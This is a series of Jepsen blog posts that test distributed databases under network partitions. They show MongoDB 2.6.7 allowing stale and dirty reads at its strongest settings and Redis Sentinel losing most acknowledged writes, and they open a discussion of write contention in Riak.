This work is a part of my research at Stripe, and I would like to thank everyone there (especially Marc Hedlund) for helping me test distributed systems and publish articles like this. I’m indebted to Boaz Leskes, Lee Hinman and Shay Banon for helping to replicate and explain these test cases. Finally, my thanks to Duretti Hirpa, Coda Hale, and Camille Fournier–and especially to my accomplished and lovely wife, Mrs. Caitie McCaffrey–for their criticism and helpful feedback on earlier drafts.

In May of 2013, we showed that MongoDB 2.4.3 would lose acknowledged writes at all consistency levels. Every write concern less than MAJORITY loses data by design due to rollbacks–but even WriteConcern.MAJORITY lost acknowledged writes, because when the server encountered a network error, it returned a successful, not a failed, response to the client. Happily, that bug was fixed a few releases later.

Since then I’ve improved Jepsen significantly and written a more powerful analyzer for checking whether or not a system is linearizable. I’d like to return to Mongo, now at version 2.6.7, to verify its single-document consistency. (Mongo 3.0 was released during my testing, and I expect they’ll be hammering out single-node data loss bugs for a little while.)

In this post, we’ll see that Mongo’s consistency model is broken by design: not only can “strictly consistent” reads see stale versions of documents, but they can also return garbage data from writes that never should have occurred. The former is (as far as I know) a new result which runs contrary to all of Mongo’s consistency documentation. The latter has been a documented issue in Mongo for some time. We’ll also touch on a result from the previous Jepsen post: almost all write concern levels allow data loss.

This analysis is brought to you by Stripe, where I now work on safety and data integrity–including Jepsen–full time. I’m delighted to work here and excited to talk about new consistency problems!

We’ll start with some background, methods, and an in-depth analysis of an example failure case, but if you’re in a hurry, you can skip ahead to the discussion.

Write consistency

First, we need to understand what MongoDB claims to offer. The Fundamentals FAQ says Mongo offers “atomic writes on a per-document-level”. From the last Jepsen post and the write concern documentation, we know Mongo’s default consistency level (Acknowledged) is unsafe. Why? Because operations are only guaranteed to be durable after they have been acknowledged by a majority of nodes. We must must use write concern Majority to ensure that successful operations won’t be discarded by a rollback later.

Why can’t we use a lower write concern? Because rollbacks are only OK if any two versions of the document can be merged associatively, commutatively, and idempotently; e.g. they form a CRDT. Our documents likely don’t have this property.

For instance, consider an increment-only counter, stored as a single integer field in a MongoDB document. If you encounter a rollback and find two copies of the document with the values 5 and 7, the correct value of the counter depends on when they diverged. If the initial value was 0, we could have had five increments on one primary, and seven increments on another: the correct value is 5 + 7 = 12. If, on the other hand, the value on both replicas was 5, and only two inserts occurred on an isolated primary, the correct value should be 7. Or it could be any value in between!

And this assumes your operations (e.g. incrementing) commute! If they’re order-dependent, Mongo will allow flat-out invalid writes to go through, like claiming the same username twice, document ID conflicts, transferring $40 + $30 = $70 out of a $50 account which is never supposed to go negative, and so on.

Unless your documents are state-based CRDTs, the following table illustrates which Mongo write concern levels are actually safe:

Write concern Also called Safe?
Unacknowledged NORMAL Unsafe: Doesn’t even bother checking for errors
Acknowledged (new default) SAFE Unsafe: not even on disk or replicated
Journaled JOURNAL_SAFE Unsafe: ops could be illegal or just rolled back by another primary
Fsynced FSYNC_SAFE Unsafe: ditto, constraint violations & rollbacks
Replica Acknowledged REPLICAS_SAFE Unsafe: ditto, another primary might overrule
Majority MAJORITY Safe: no rollbacks (but check the fsync/journal fields)

So: if you use MongoDB, you should almost always be using the Majority write concern. Anything less is asking for data corruption or loss when a primary transition occurs.

Read consistency

The FAQ Fundamentals doesn’t just promise atomic writes, though: it also claims “fully-consistent reads”. The Replication Introduction goes on:

The primary accepts all write operations from clients. Replica set can have only one primary. Because only one member can accept write operations, replica sets provide strict consistency for all reads from the primary.

What does “strict consistency” mean? Mongo’s glossary defines it as

A property of a distributed system requiring that all members always reflect the latest changes to the system. In a database system, this means that any system that can provide data must reflect the latest writes at all times. In MongoDB, reads from a primary have strict consistency; reads from secondary members have eventual consistency.

The Replication docs agree: “By default, in MongoDB, read operations to a replica set return results from the primary and are consistent with the last write operation”, as distinct from “eventual consistency”, where “the secondary member’s state will eventually reflect the primary’s state.”

Read consistency is controlled by the Read Preference, which emphasizes that reads from the primary will see the “latest version”:

By default, an application directs its read operations to the primary member in a replica set. Reading from the primary guarantees that read operations reflect the latest version of a document.

And goes on to warn that:

…. modes other than primary can and will return stale data because the secondary queries will not include the most recent write operations to the replica set’s primary.

All read preference modes except primary may return stale data because secondaries replicate operations from the primary with some delay. Ensure that your application can tolerate stale data if you choose to use a non-primary mode.

So, if we write at write concern Majority, and read with read preference Primary (the default), we should see the most recently written value.

CaS rules everything around me

When writes and reads are concurrent, what does “most recent” mean? Which states are we guaranteed to see? What could we see?

Concurrent operations can occur in either order

For concurrent operations, the absence of synchronized clocks prevents us from establishing a total order. We must allow each operation to come just before, or just after, any other in-flight writes. If we write a, initiate a write of b, then perform a read, we could see either a or b depending on which operation takes place first.

After operations complete, visibility is guaranteed

On the other hand, we obviously shouldn’t interact with a value from the future–we have no way to tell what those operations will be. The latest possible state an operation can see is the one just prior to the response received by the client.

And because we need to see the “most recent write operation”, we should not be able to interact with any state prior to the ops concurrent with the most recently acknowledged write. It should be impossible, for example, to write a, write b, then read a: since the writes of a and b are not concurrent, the second should always win.

This is a common strong consistency model for concurrent data structures called linearizability. In a nutshell, every successful operation must appear to occur atomically at some time between its invocation and response.

So in Jepsen, we’ll model a MongoDB document as a linearizable compare-and-set (CaS) register, supporting three operations:

  • write(x'): set the register’s value to x'
  • read(x): read the current value x. Only succeeds if the current value is actually x.
  • cas(x, x'): if and only if the value is currently x, set it to x'.

We can express this consistency model as a singlethreaded datatype in Clojure. Given a register containing a value, and an operation op, the step function returns the new state of the register–or a special inconsistent value if the operation couldn’t take place.

(defrecord CASRegister [value] Model (step [r op] (condp = (:f op) :write (CASRegister. (:value op)) :cas (let [[cur new] (:value op)] (if (= cur value) (CASRegister. new) (inconsistent (str "can't CAS " value " from " cur " to " new)))) :read (if (or (nil? (:value op)) (= value (:value op))) r (inconsistent (str "can't read " (:value op) " from register " value))))))

Then we’ll have Jepsen generate a mix of read, write, and CaS operations, and apply those operations to a five-node Mongo cluster. Over the course of a few minutes we’ll have five clients perform those random read, write, and CaS ops against the cluster, while a special nemesis process creates and resolves network partitions to induce cluster transitions.

Finally, we’ll have Knossos analyze the resulting concurrent history of all clients' operations, in search of a linearizable path through the history.

Inconsistent reads

Surprise! Even when all writes and CaS ops use the Majority write concern, and all reads use the Primary read preference, operations on a single document in MongoDB are not linearizable. Reads taking place just after the start of a network partition demonstrate impossible behaviors.

In this history, an anomaly appears shortly after the nemesis isolates nodes n1 and n3 from n2, n4, and n5. Each line shows a singlethreaded process (e.g. 2) performing (e.g. :invoke) an operation (e.g. :read), with a value (e.g. 3).

An :invoke indicates the start of an operation. If it completes successfully, the process logs a corresponding :ok. If it fails (by which we mean the operation definitely did not take place) we log :fail instead. If the operation crashes–for instance, if the network drops, a machine crashes, a timeout occurs, etc.–we log an :info message, and that operation remains concurrent with every subsequent op in the history. Crashed operations could take effect at any future time.

Not linearizable. Linearizable prefix was: 2 :invoke :read 3 4 :invoke :write 3 ... 4 :invoke :read 0 4 :ok :read 0 :nemesis :info :start "Cut off {:n5 #{:n3 :n1}, :n2 #{:n3 :n1}, :n4 #{:n3 :n1}, :n1 #{:n4 :n2 :n5}, :n3 #{:n4 :n2 :n5}}" 1 :invoke :cas [1 4] 1 :fail :cas [1 4] 3 :invoke :cas [4 4] 3 :fail :cas [4 4] 2 :invoke :cas [1 0] 2 :fail :cas [1 0] 0 :invoke :read 0 0 :ok :read 0 4 :invoke :read 0 4 :ok :read 0 1 :invoke :read 0 1 :ok :read 0 3 :invoke :cas [2 1] 3 :fail :cas [2 1] 2 :invoke :read 0 2 :ok :read 0 0 :invoke :cas [0 4] 4 :invoke :cas [2 3] 4 :fail :cas [2 3] 1 :invoke :read 4 1 :ok :read 4 3 :invoke :cas [4 2] 2 :invoke :cas [1 1] 2 :fail :cas [1 1] 4 :invoke :write 3 1 :invoke :read 3 1 :ok :read 3 2 :invoke :cas [4 2] 2 :fail :cas [4 2] 1 :invoke :cas [3 1] 2 :invoke :write 4 0 :info :cas :network-error 2 :info :write :network-error 3 :info :cas :network-error 4 :info :write :network-error 1 :info :cas :network-error 5 :invoke :write 1 5 :fail :write 1 ... more failing ops which we can ignore since they didn't take place ... 5 :invoke :read 0 Followed by inconsistent operation: 5 :ok :read 0
A diagram of the concurrent operations from this history

This is a little easier to understand if we sketch a diagram of the last few operations–the events occurring just after the network partition begins. In this notation, time moves from left to right, and each process is a horizontal track. A green bar shows the interval between :invoke and :ok for a successful operation. Processes that crashed with :info are shown as yellow bars running to infinity–they’re concurrent with all future operations.

In order for this history to be linearizable, we need to find a path which always moves forward in time, touches each OK (green) operation once, and may touch crashed (yellow) operations at most once. Along that path, the rules we described for a CaS register should hold–writes set the value, reads must see the current value, and compare-and-set ops set a new value iff the current value matches.

An initial path

The very first operation here is process 2’s read of the value 0. We know the value must be zero when it completes, because there are no other concurrent ops.

The next read we have to satisfy is process 1’s read of 4. The only operation that could have taken place between those two reads is process 0’s crashed CaS from 0 to 4, so we’ll use that as an intermediary.

Note that this path always moves forward in time: linearizability requires that operations take effect sometime between their invocation and their completion. We can choose any point along the operation’s bar for the op to take effect, but can’t travel through time by drawing a line that moves back to the left! Also note that along the purple line, our single-threaded model of a register holds: we read 0, change 0->4, then read 4.

Process 1 goes on to read a new value: 3. We have two operations which could take place before that read. Executing a compare-and-set from 4 to 2 would be legal because the current value is 4, but that would conflict with a subsequent read of 3. Instead we apply process 4’s write of 3 directly.

Changing 4 to 2, then an invalid read of 3
Writing 3, then reading 3

Now we must find a path leading from 3 to the final read of 0. We could write 4, and optionally CaS that 4 to 2, but neither of those values is consistent with a read of 0.

Writing 4, then an invalid read of 0
Writing 4, changing 4 to 2, then an invalid read of 0
Changing 3 to 1, then an invalid read of 0

We could also CaS 3 to 1, which would give us the value 1, but that’s not 0 either! And applying the write of 4 and its dependent paths won’t get us anywhere either; we already showed those are inconsistent with reading 0. We need a write of 0, or a CaS to 0, for this history to make sense–and no such operation could possibly have happened here.

Each of these failed paths is represented by a different “possible world” in the Knossos analysis. At the end of the file, Knossos comes to the same conclusion we drew from the diagram: the register could have been 1, 2, 3, or 4–but not 0. This history is illegal.

It’s almost as if process 5’s final read of zero is connected to the state that process 2 saw, just prior to the network partition. As if the state of the system weren’t linear after all–a read was allowed to travel back in time to that earlier state. Or, alternatively, the state of the system split in two–one for each side of the network partition–writes occurring on one side, and on the other, the value remaining 0.

Dirty reads and stale reads

We know from this test that MongoDB does not offer linearizable CaS registers. But why?

One possibility is that this is the result of Mongo’s read-uncommitted isolation level. Although the docs say “For all inserts and updates, MongoDB modifies each document in isolation: clients never see documents in intermediate states,” they also warn:

MongoDB allows clients to read documents inserted or modified before it commits these modifications to disk, regardless of write concern level or journaling configuration…

For systems with multiple concurrent readers and writers, MongoDB will allow clients to read the results of a write operation before the write operation returns.

Which means that clients can read documents in intermediate states. Imagine the network partitions, and for a brief time, there are two primary nodes–each sharing the initial value 0. Only one of them, connected to a majority of nodes, can successfully execute writes with write concern Majority. The other, which can only see a minority, will eventually time out and step down–but this takes a few seconds.

Dirty reads take place against modified data on the minority primary. Stale reads take place against unchanged data on the minority primary, after new data has been written to the majority primary.

If a client writes (or CaS’s) the value on the minority primary to 1, MongoDB will happily modify that primary’s local state before confirming with any secondaries that the write is safe to perform! It’ll be changed back to 0 as a part of the rollback once the partition heals–but until that time, reads against the minority primary will see 1, not 0! We call this anomaly a dirty read because it exposes garbage temporary data to the client.

Alternatively, no changes could occur on the minority primary–or whatever writes do take place leave the value unchanged. Meanwhile, on the majority primary, clients execute successful writes or CaS ops, changing the value to 1. If a client executes a read against the minority primary, it will see the old value 0, even though a write of 1 has taken place.

Because Mongo allows dirty reads from the minority primary, we know it must also allow clean but stale reads against the minority primary. Both of these anomalies are present in MongoDB.

Dirty reads are a known issue, but to my knowledge, nobody is aware that Mongo allows stale reads at the strongest consistency settings. Since Mongo’s documentation repeatedly states this anomaly should not occur, I’ve filed SERVER-17975.

What does that leave us with?

What Mongo's documentation claims to offer, vs what it actually provides

Even with Majority write concern and Primary read preference, reads can see old versions of documents. You can write a, then write b, then read a back. This invalidates a basic consistency invariant for registers: Read Your Writes.

Mongo also allows you to read alternating fresh and stale versions of a document–successive reads could see a, then b, then a again, and so on. This violates Monotonic Reads.

Because both of these consistency models are implied by the PRAM memory model, we know MongoDB cannot offer PRAM consistency–which in turn rules out causal, sequential, and linearizable consistency.

Because Mongo allows you to read uncommitted garbage data, we also know MongoDB can’t offer Read Committed, Cursor Stability, Monotonic Atomic View, Repeatable Read, or serializability. On the map of consistency models to the right, this leaves Writes Follow Reads, Monotonic Write, and Read Uncommitted–all of which, incidentally, are totally-available consistency models even when partitions occur.

Conversely, Mongo’s documentation repeatedly claims that one can read “the latest version of a document”, and that Mongo offers “immediate consistency”. These properties imply that reads, writes, and CaS against a single document should be linearizable. Linearizable consistency implies that Mongo should also ensure:

  • Sequential consistency: all processes agree on op order
  • Causal consistency: causally related operations occur in order
  • PRAM: a parallel memory model
  • Read Your Writes: a process can only read data from after its last write
  • Monotonic Read: a process’s successive reads must occur in order
  • Monotonic Write: a process’s successive writes must occur in order
  • Write Follows Read: a process’s writes must logically follow its last read

Mongo 2.6.7 (and presumably 3.0.0, which has the same read-uncommitted semantics) only ensures the last two invariants. I argue that this is neither “strict” nor “immediate” consistency.

How bad are dirty reads?

Read uncommitted allows all kinds of terrible anomalies we probably don’t want as MongoDB users.

For instance, suppose we have a user registration service keyed by a unique username. Now imagine a partition occurs, and two users–Alice and Bob–try to claim the same username–one on each side of the partition. Alice’s request is routed to the majority primary, and she successfully registers the account. Bob, talking to the minority primary, will see his account creation request time out. The minority primary will eventually roll his account back to a nonexistent state, and when the partition heals, accept Alice’s version.

But until the minority primary detects the failure, Bob’s invalid user registration will still be visible for reads. After registration, the web server redirects Alice to /my/account to show her the freshly created account. However, this HTTP request winds up talking to a server whose client still thinks the minority primary is valid–and that primary happily responds to a read request for the account with Bob’s information.

Alice’s page loads, and in place of her own data, she sees Bob’s name, his home address, his photograph, and other things that never should have been leaked between users.

You can probably imagine other weird anomalies. Temporarily visible duplicate values for unique indexes. Locks that appear to be owned by two processes at once. Clients seeing purchase orders that never went through.

Or consider a reconciliation process that scans the list of all transactions a client has made to make sure their account balance is correct. It sees an attempted but invalid transaction that never took place, and happily sets the user’s balance to reflect that impossible transaction. The mischievous transaction subsequently disappears on rollback, leaving customer support to puzzle over why the numbers don’t add up.

Or, worse, an admin goes in to fix the rollback, assumes the invalid transaction should have taken place, and applies it to the new primary. The user sensibly retried their failed purchase, so they wind up paying twice for the same item. Their account balance goes negative. They get hit with an overdraft fine and have to spend hours untangling the problem with support.

Read-uncommitted is scary.

What if we just fix read-uncommitted?

dirty-stale.jpg

Mongo’s engineers initially closed the stale-read ticket as a duplicate of SERVER-18022, which addresses dirty reads. However, as the diagram illustrates, only showing committed data on the minority primary will not solve the problem of stale reads. Even if the minority primary accepts no writes at all, successful writes against the majority node will allow us to read old values.

That invalidates Monotonic Read, Read Your Writes, PRAM, causal, sequential, and linearizable consistency. The anomalies are less terrifying than Read Uncommitted, but still weird.

For instance, let’s say two documents are always supposed to be updated one after the other–like creating a new comment document, and writing a reference to it into a user’s feed. Stale reads allow you to violate the implicit foreign key constraint there: the user could load their feed and see a reference to comment 123, but looking up comment 123 in Mongo returns Not Found.

A user could change their name from Charles to Désirée, have the change go through successfully, but when the page reloads, still see their old name. Seeing old values could cause users to repeat operations that they should have only attempted once–for instance, adding two or three copies of an item to their cart, or double-posting a comment. Your clients may be other programs, not people–and computers are notorious for retrying “failed” operations very fast.

Stale reads can also cause lost updates. For instance, a web server might accept a request to change a user’s profile photo information, write the new photo URL to the user record in Mongo, and contact the thumbnailer service to generate resized copies and publish them to S3. The thumbnailer sees the old photo, not the newly written one. It happily resizes it, and uploads the old avatar to S3. As far as the backend and thumbnailer are concerned, everything went just fine–but the user’s photo never changes. We’ve lost their update.

What if we just pretend this is how it’s supposed to work?

Mongo then closed the ticket, claiming it was working as designed.

What are databases? We just don’t know.

So where does that leave us?

Despite claiming “immediate” and “strict consistency”, with reads that see “the most recent write operations”, and “the latest version”, MongoDB, even at the strongest consistency levels, allows reads to see old values of documents or even values that never should have been written. Even when Mongo supports Read Committed isolation, the stale read problem will likely persist without a fundamental redesign of the read process.

SERVER-18022 targets consistent reads for Mongo 3.1. SERVER-17975 has been re-opened, and I hope Mongo’s engineers will consider the problem and find a way to address it. Preventing stale reads requires coupling the read process to the oplog replication state machine in some way, which will probably be subtle–but Consul and etcd managed to do it in a few months, so the problem’s not insurmountable!

In the meantime, if your application requires linearizable reads, I can suggest a workaround! CaS operations appear (insofar as I’ve been able to test) to be linearizable, so you can perform a read, then try to findAndModify the current value, changing some irrelevant field. If that CaS succeeds, you know the document had that state at some time between the invocation of the read and the completion of the CaS operation. You will, however, incur an IO and latency penalty for the extra round-trips.

And remember: always use the Majority write concern, unless your data is structured as a CRDT! If you don’t, you’re looking at lost updates, and that’s way worse than any of the anomalies we’ve discussed here!

Finally, read the documentation for the systems you depend on thoroughly–then verify their claims for yourself. You may discover surprising results!

Next, on Jepsen: Elasticsearch 1.5.0

My thanks to Stripe and Marc Hedlund for giving me the opportunity to perform this research, and a special thanks to Peter Bailis, Michael Handler, Coda Hale, Leif Walsh, and Dan McKinley for their comments on early drafts. Asya Kamsky pointed out that Mongo will optimize away identity CaS operations, which prevents their use as a workaround.

If you, as a database vendor, implement a few features in your API, I can probably offer repeatable automated tests of your DB’s partition tolerance through Jepsen.

The outcome of these tests would be a set of normalized metrics for each DB like “supports linearizability”, “available for writes when a majority partition exists”, “available for writes when no majority available”, “fraction of writes successful”, “fraction of writes denied”, “fraction of writes acked then lost”, “95th latency during condition X”, and so forth. I’m thinking this would be a single-page web site–a spreadsheet, really–making it easy to compare and contrast DBs and find one that fits your safety needs.

At a minimum, I need to know:

  • After initial startup, when is the database stable and ready to accept writes?
  • For a given key, which node (if any) is the primary replica?
  • For a given key, which node (if any) are secondary replicas?
  • After partitions end, when has the database fully recovered? (e.g. has it completed handoff, replayed oplogs, etc)

I also need totally automated, reliable scripting of DB installation and provisioning. Many DBs make it really tough to join nodes from the shell.

This is gonna take several months of my time and a nontrivial amount of money for hardware. I’m looking at a few options, from physical hardware in my garage to renting EC2 compute nodes. EC2 means anybody could, in theory, run these benchmarks themselves–but there are a ton of moving pieces involved, it takes a lot more work to set up, and VM performance is really variable. Ideally, someone out there has five or six identical boxes they don’t need any more–maybe leftover desktops, 1Us from a decommissioned colo, whatever. They don’t have to be all that fast, but I’m hitting the limits of what I can do on virtualized infrastructure.

If you want to make this happen, and can help make the necessary API improvements, write automation scripts for Jepsen, provide hardware or hosting, etc., please email aphyr@aphyr.com.

Previously on Jepsen, we explored two-phase commit in Postgres. In this post, we demonstrate Redis losing 56% of writes during a partition.

Redis is a fantastic data structure server, typically deployed as a shared heap. It provides fast access to strings, lists, sets, maps, and other structures with a simple text protocol. Since it runs on a single server, and that server is single-threaded, it offers linearizable consistency by default: all operations happen in a single, well-defined order. There’s also support for basic transactions, which are atomic and isolated from one another.

Because of this easy-to-understand consistency model, many users treat Redis as a message queue, lock service, session store, or even their primary database. Redis running on a single server is a CP system, so it is consistent for these purposes.

What about high availability?

-026.jpg

Redis offers asynchronous primary->secondary replication. A single server is chosen as the primary, which can accept writes. It relays its state changes to secondary servers, which follow along. Asynchronous means that you don’t have to wait for a write to be replicated before the primary returns a response to the client. Writes will eventually arrive on the secondaries, if we wait long enough. In our application, all 5 clients will read from the primary on n1, and n2–n5 will be secondaries.

This is still a CP system, so long as we never read from the secondaries. If you do read from the secondaries, it’s possible to read stale data. That’s just fine for something like a cache! However, if you read data from a secondary, then write it to the primary, you could inadvertently destroy writes which completed but weren’t yet replicated to the secondaries.

What happens if the primary fails? We need to promote one of the secondary servers to a new primary. One option is to use Heartbeat or a STONITH system which keeps a link open between two servers, but if the network partitions we don’t have any way to tell whether the other side is alive or not. If we don’t promote the primary, there could be no active servers. If we do promote the primary, there could be two active servers. We need more nodes.

If one connected component of the network contains a majority (more than N/2) of nodes, we call it a quorum. We’re guaranteed that at most one quorum exists at any point in time–so if a majority of nodes can see each other, they know that they’re the only component in that state. That group of nodes (also termed a “component”) has the authority to promote a new primary.

Redis has a system called Sentinel, which, when configured correctly, will try to establish a quorum between Sentinel nodes, agree on which Redis servers are alive, and promote any which appear to have failed. If we colocate the Sentinel nodes with the Redis nodes, this should allow us to promote a new primary in the majority component (should one exist).

-029.jpg
-030.jpg

What are the consistency and availability properties of Sentinel? Antirez, the author of Redis, says:

Redis Cluster for instance is a system biased towards consistency rather than availability. Redis Sentinel itself is an HA solution with the dogma of consistency and master slave setups.“

So we expect this system to be CP. Nodes in the minority component will become unavailable during the partition, and the majority component will elect a new primary. The Sentinels will then order clients to abandon the old primary and reconnect to the new one.

-031.jpg

Before we begin, it’s important to recognize that Redis does not guarantee durability. Since writes to disk and replication to secondaries are asynchronous, we can lose up to N seconds of the most recent writes. We should not, however, see gaps in the write log. If write n is present, so are writes 0, 1, … n-2, n-1.

Partitioning the cluster

Here’s a simple application which writes a list of numbers to a Redis set. At this time Carmine, the Clojure Redis client, doesn’t yet support failover using Sentinel. I’ve implemented a stricter version of the Sentinel client algorithm here: asking the server for a new primary before every write. Sentinel actually states that clients should only select new primaries when their connection is closed, which leaves a wider window for clients to disagree about which primary to use–leading to the possibility of more conflicting writes.

Let’s give it a shot. First, set up Redis:

salticid redis.setup

Then, in two terminals, start up Redis and Redis Sentinel:

salticid redis.startsalticid redis.sentinel

You should see messages go by as the sentinels discover one another and ensure all the nodes are properly configured. You can check the replication status with salticid redis.replication. salticid redis.stop will shut down the Redis servers and sentinels alike.

Now let’s run our application with lein run redis, then partition nodes n1 and n2 away from n3, n4, and n5 by running salticid jepsen.partition.

376 :ok 378 :ok 382 :ok 384 :ok 380 :ok 381 :ok 383 :ok 389 :ok 385 :ok

The first thing you’ll notice is that even though n1 can’t possibly be replicating its writes to n3, n4, and n5, writes against it are still completing successfully. N1 still thinks it’s the primary, and since replication is asynchronous, it’s acknowledging writes before they’re sent to others in the cluster. The sentinels notice the failure, and n3, n4, and n5’s sentinels promote a new primary:

19 May 00:37:36.314 # +sdown master mymaster 10.10.3.242 6379 19 May 00:37:36.616 # +sdown slave 10.10.3.52:6379 10.10.3.52 6379 @ mymaster 10.10.3.242 6379 19 May 00:37:36.816 # +sdown sentinel 10.10.3.52:26379 10.10.3.52 26379 @ mymaster 10.10.3.242 6379 19 May 00:37:36.816 # +sdown sentinel 10.10.3.242:26379 10.10.3.242 26379 @ mymaster 10.10.3.242 6379 19 May 00:37:37.521 # +odown master mymaster 10.10.3.242 6379 #quorum 3/3 19 May 00:37:48.041 # +failover-detected master mymaster 10.10.3.242 6379 19 May 00:37:48.142 * +slave-reconf-inprog slave 10.10.3.101:6379 10.10.3.101 6379 @ mymaster 10.10.3.242 6379 19 May 00:37:48.143 * +slave-reconf-inprog slave 10.10.3.95:6379 10.10.3.95 6379 @ mymaster 10.10.3.242 6379 19 May 00:37:49.145 * +slave-reconf-done slave 10.10.3.101:6379 10.10.3.101 6379 @ mymaster 10.10.3.242 6379 19 May 00:37:49.145 * +slave-reconf-done slave 10.10.3.95:6379 10.10.3.95 6379 @ mymaster 10.10.3.242 6379 19 May 00:37:49.243 # +failover-end master mymaster 10.10.3.242 6379

Now n5 is a new primary–but n1 is still a primary too! Run salticid redis.replication to see the replication status of all nodes. We have two primary nodes, one in each component of the system. During this time both primaries are accepting writes independently. This is a classic split-brain scenario–and it violates the C in CP. Writes (and reads) in this state are not linearizable, because clients will see different results based on which node they’re talking to.

-037.jpg
-038.jpg

Healing the partition

What happens when the network comes back online? salticid jepsen.heal repairs the partition, and the Sentinel nodes will discover each other again.

Redis Sentinel used to leave both primaries running indefinitely, which meant that any scenario like a partition or crash leading to failover would result in permanent split-brain. That’s fixed in version 2.6.13, which came out last week. Now, Sentinel demotes the old primary on n1 when it comes back into contact with the majority component. The client sees:

1687 :ok 1686 READONLY You can't write against a read only slave. 1690 READONLY You can't write against a read only slave. 1693 :ok

… since n1 stepped down just after a Sentinel told us it was a primary. Clients are a part of the distributed system too. If a system’s correctness depends on clients choosing specific nodes at specific times, the clients are now engaged in a distributed consensus problem–not to mention a clock synchronization problem. This is damn hard to do correctly.

Results

1991 :ok 1995 :ok 1996 :ok Hit enter when ready to collect results. Writes completed in 42.002 seconds 2000 total 1998 acknowledged 872 survivors 1126 acknowledged writes lost! (╯°□°)╯︵ ┻━┻ 50 51 52 53 54 55 ... 1671 1675 1676 1680 1681 1685 0.999 ack rate 0.5635636 loss rate 0.0 unacknowledged but successful rate

Out of 2000 writes, Redis claimed that 1998 of them completed successfully. However, only 872 of those integers were present in the final set. Redis threw away 56% of the writes it told us succeeded.

-041.jpg

There are two problems at work here. First, notice that all the clients lost writes at the beginning of the partition: (50, 51, 52, 53, …). That’s because they were all writing to n1 when the network dropped–and since n1 was demoted later, any writes made during that window were destroyed.

The second problem was caused by split-brain: both n1 and n5 were primaries up until the partition healed. Depending on which node they were talking to, some clients might have their writes survive, and others have their writes lost. The last few numbers in the set, mod 5, are all 0 and 1: the clients which kept using n1 as a primary, in the minority partition.

Note that both of these failure modes violate the durability guarantees we claimed earlier for Redis, because there are gaps in the write log.

Redis strategies

So you’re running a distributed Redis install, and have realized that the design of Redis Sentinel (or, for that matter, any other failover system on top of an asynchronously replicated primary-secondary design) means you can lose a lot of data when a partition occurs. What can you do?

From an operations perspective, I recommend you try to understand the Sentinel consensus algorithm. I don’t, and I’ve read it a dozen times.

I tried to write a formal verification of the algorithm in TLA+, and failed. There are dozens of interacting rules which can lead to phenomenally complex edge cases. The whole thing relies on clocks–and a special mode, TILT, which tries to detect sudden clock skew. You can specify a quorum which is smaller than the number of sentinels, allowing multiple quorums to operate simultaneously. Since the system auto-discovers peers, you’ve got to make sure nobody lets a new sentinel talk to your cluster, or you might find yourself with a quorum smaller than N/2. Client, sentinel, and Redis server topologies are all different things, which (I think) means…

  • Sentinels could promote a node no clients can see
  • Sentinels could demote the only node clients can actually reach
  • Sentinels could assume a totally connected group of servers is unavailable
  • Sentinels could promote an isolated node in a minority component, then destroy data on the majority by demoting their primary later

I (tentatively) recommend running exactly one sentinel on each server node, to force server and sentinel network topologies to align. Unless the partition doesn’t happen in the network, but somewhere upwards of layer 3. Let’s not talk about that possibility.

As an application developer working with Redis, one option is simply to estimate and accept your data loss. Not all applications have to be consistent. Microsoft estimates their WAN links have about 99.5% availability, and their datacenter networks are about 10x more reliable, going down for about 4 hours per year. Not all network failures result in this kind of partition. If you’re running good network hardware in redundant configurations in real datacenters (e.g. not EC2), you cut your probability of partition down pretty far. Plenty of important applications can tolerate data loss for a few hours a year.

If you can’t tolerate data loss, Redis Sentinel (and by extension Redis Cluster) is not safe for use as:

  • A lock service
  • A queue
  • A database

If you use Redis as a lock service, this type of partition means you can take out the same lock twice–or up to N times for N nodes! Or maybe multiple times concurrently, against the same node, if you want to get weird about it. Write loss means locks can be resurrected from the dead, or vanish even when supposedly held. Bottom line: distributed lock services must be CP. Use a CP consensus system, like Zookeeper.

If you use Redis as a queue, it can drop enqueued items. However, it can also re-enqueue items which were removed. An item might be delivered zero, one, two, or more times. Most distributed queue services can provide reliable at-most-once or at-least-once delivery. CP queue systems can provide reliable exactly-once delivery with higher latency costs. Use them if message delivery is important.

If you use Redis as a database, be prepared for clients to disagree about the state of the system. Batch operations will still be atomic (I think), but you’ll have no inter-write linearizability, which almost all applications implicitly rely on. If you successfully write A, then B, you expect that any client which can see B can also see A. This is not the case. Be prepared for massive write loss during a partition, depending on client, server, and sentinel topology.

Because Redis does not have a consensus protocol for writes, it can’t be CP. Because it relies on quorums to promote secondaries, it can’t be AP. What it can be is fast, and that’s an excellent property for a weakly consistent best-effort service, like a cache. Redis Sentinel can do a great job of keeping your caches warm even in the face of network and node failure, and helping clients to gradually discover the correct nodes to interact with. Use Redis Sentinel for caching, sampling, statistics, and messaging where getting the wrong answer doesn’t hurt much. Occasional windows of 50% write loss may be just fine for your user feeds, hit counters, or upvotes.

In the next post, we’ll learn about a database with a related replication architecture: MongoDB.

library.jpg

Write contention occurs when two people try to update the same piece of data at the same time.

We know several ways to handle write contention, and they fall along a spectrum. For strong consistency (or what CAP might term “CP”) you can use explicit locking, perhaps provided by a central server; or optimistic concurrency where writes proceed through independent transactions, but can fail on conflicting commits. These approaches need not be centralized: consensus protocols like Paxos or two-phase-commit allow a cluster of machines to agree on an isolated transaction–either with pessimistic or optimistic locking, even in the face of some failures and partitions.

On the other end of the spectrum are the AP solutions, where both writes are accepted, but are resolved at a later time. If the resolution process is monotonic (always progresses towards a stable value regardless of order), we call the system “eventually consistent”. Given sufficient time to repair itself, some correct value will emerge.

What kind of resolution function should we use? Well our writes happen over time, and newer values are more correct than old ones. We could pick the most recently written value, as determined by a timestamp. Assuming our clocks are synchronized more tightly than the time between conflicting writes, this guarantees that the last write wins.

But wait! If I’m storing a list of the 500,000 people who follow, say, @scoblizer, and two people follow him at the same time… and last-write-wins chooses the most recently written set of followers… I’ll have lost a write! That’s bad! It’s rare–at Showyou we saw conflicts in ~1% of follower lists–but it still disrupts the user experience enough that I care about solving the problem *correctly. My writes should never be lost so long as Riak is doing its thing.

Well, Riak is naturally AP, and could accept both writes simultaneously, and you could resolve them somehow. OR-sets are provably correct, fit quite naturally to how you expect following to work, and reduce the probability of any contention to single elements, rather than the entire set. But maybe we haven’t heard of CRDTs yet, or thought (as I did for some time) that 2P sets were as good as it gets. That’s OK; CRDTs have only been formally described for a couple of years.

Serializing writes with mutexes

So what if we used locking on top of Riak?

